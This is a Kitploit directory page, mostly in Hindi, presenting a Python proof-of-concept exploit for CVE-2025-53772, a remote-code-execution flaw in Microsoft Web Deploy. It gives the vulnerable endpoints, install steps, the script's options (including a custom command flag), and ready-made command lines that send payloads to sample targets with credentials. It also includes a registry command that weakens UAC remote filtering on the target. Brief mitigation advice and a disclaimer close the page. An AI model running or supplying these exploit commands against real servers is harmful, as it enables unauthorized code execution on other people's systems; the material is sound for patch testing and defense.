Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-53772 — poc for cve-2025-53772 | Kitploit
उपकरण/GitHubGitHub/sailay1996/cve-2025-53772
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubsailay1996/cve-2025-53772

CVE-2025-53772

poc for cve-2025-53772

रिपॉजिटरी देखें
46118 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-53772 - Microsoft Web Deploy RCE शोषण

CVE-2025-53772 के लिए एक Python-आधारित शोषण, जो Microsoft Web Deploy (msdeploy) में HTTP हेडर डेटा के असुरक्षित डिसीरियलाइज़ेशन के कारण उत्पन्न एक रिमोट कोड निष्पादन भेद्यता है।

🎬 POC वीडियो

POC


भेद्यता अवलोकन

गुणमान
CVE IDCVE-2025-53772
CVSS स्कोर8.8 (उच्च)
प्रभावित उत्पादMicrosoft Web Deploy 4.0
संवेदनशील संस्करण< 10.0.2001
पैच किया गया संस्करण10.0.2001+
भेद्यता प्रकारअविश्वसनीय डेटा का डिसीरियलाइज़ेशन (CWE-502)
प्रमाणीकरणआवश्यक (निम्न विशेषाधिकार)

यह कैसे काम करता है

भेद्यता MSDeploy.SyncOptions HTTP हेडर के डिसीरियलाइज़ेशन में मौजूद है। जब एक विशेष रूप से तैयार पेलोड भेजा जाता है, तो सर्वर इसे BinaryFormatter का उपयोग करके डिसीरियलाइज़ करता है, जो TypeConfuseDelegate गैजेट श्रृंखला के माध्यम से मनमाना कोड निष्पादन को ट्रिगर करता है।

root@kitploit:~
Attacker                                    Target Server
   │                                              │
   │  POST /MSDEPLOYAGENTSERVICE HTTP/1.1         │
   │  MSDeploy.SyncOptions: <malicious_payload>   │
   │─────────────────────────────────────────────>│
   │                                              │
   │                            BinaryFormatter.Deserialize()
   │                                     │
   │                                     ▼
   │                            Process.Start("cmd.exe", "/c ...")
   │                                     │
   │                                     ▼
   │                              RCE Achieved!

प्रभावित एंडपॉइंट्स

एंडपॉइंटपोर्टप्रोटोकॉलप्रमाणीकरण प्रकार
/MSDEPLOYAGENTSERVICE80HTTPNTLM
/msdeploy.axd8172HTTPSBasic

स्थापना

root@kitploit:~
git clone https://github.com/sailay1996/CVE-2025-53772.git
cd CVE-2025-53772
pip install -r requirements.txt

आवश्यकताएँ

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
requests-ntlm>=1.2.0

उपयोग

त्वरित आरंभ

root@kitploit:~
# Create proof file in C:\Windows\Temp\pwned.txt
python3 CVE-2025-53772.py -t <TARGET_IP> -u "<DOMAIN\username>" -P "<password>" --ntlm --proof-temp

CVE-2025-53772.py

विकल्प

root@kitploit:~
-t, --target      Target IP or hostname (required)
-u, --user        Username (required)
-P, --password    Password (required)
--port            Target port (default: 80)
--endpoint        Endpoint path (default: /MSDEPLOYAGENTSERVICE)
--ntlm            Use NTLM authentication (required for Agent Service)
--calc            Execute calc.exe
--proof-temp      Create C:\Windows\Temp\pwned.txt
--proof-web       Create C:\inetpub\wwwroot\pwned.txt
-c, --command     Custom command to execute
--generate-only   Only generate payload, don't send
-o, --output      Save payload to file

उदाहरण

एजेंट सेवा (पोर्ट 80 - NTLM प्रमाणीकरण)

root@kitploit:~
# Pop calculator
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\Administrator" -P "P@ssw0rd" --ntlm --calc

# Create proof file in temp folder
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\webdeploy" -P "Password123" --ntlm --proof-temp

# Create proof file in webroot (verify via browser)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm --proof-web

# Execute custom command
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm -c "whoami > C:\Windows\Temp\whoami.txt"

# Generate payload only (don't send)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "test" -P "test" --generate-only --proof-temp -o payload.txt

WMSvc सेवा (पोर्ट 8172 - बेसिक प्रमाणीकरण)

root@kitploit:~
# Using msdeploy.axd endpoint (no --ntlm flag)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "webdeploy" -P "Password123" --port 8172 --endpoint "/msdeploy.axd" --proof-temp

सत्यापन

शोषण चलाने के बाद, लक्ष्य पर निष्पादन सत्यापित करें:

root@kitploit:~
# Check for proof file
type C:\Windows\Temp\pwned.txt

# Or via browser (if --proof-web was used)
# Navigate to: http://<TARGET>/pwned.txt

सामान्य समस्याएँ

401 अनधिकृत (NTLM)

यदि एजेंट सेवा का उपयोग NTLM के साथ कर रहे हैं और 401 मिल रहा है:

root@kitploit:~
# On target, disable UAC remote filtering:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

404 नहीं मिला (msdeploy.axd)

IIS हैंडलर पंजीकृत नहीं हो सकता है। इसके बजाय एजेंट सेवा एंडपॉइंट का उपयोग करें:

root@kitploit:~
--port 80 --endpoint "/MSDEPLOYAGENTSERVICE"

संवेदनशील संस्करण सत्यापित करें

root@kitploit:~
# Check installed version
(Get-Command msdeploy.exe).FileVersionInfo.FileVersion
# Vulnerable if < 10.0.2001

शमन

  1. Web Deploy को अपडेट करें संस्करण 10.0.2001 या बाद में
  2. पहुंच प्रतिबंधित करें Web Deploy एंडपॉइंट्स तक फ़ायरवॉल के माध्यम से
  3. मजबूत क्रेडेंशियल्स का उपयोग करें और पासवर्ड पुन: उपयोग से बचें
  4. लॉग्स की निगरानी करें पोर्ट 80/8172 पर संदिग्ध गतिविधि के लिए
  5. Web Deploy को अक्षम करें यदि आवश्यक नहीं है

संदर्भ

  • Microsoft सुरक्षा सलाह
  • NVD - CVE-2025-53772
  • HawkTrace द्वारा मूल शोध

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।


लाइसेंस

MIT लाइसेंस

टूल डाउनलोड करें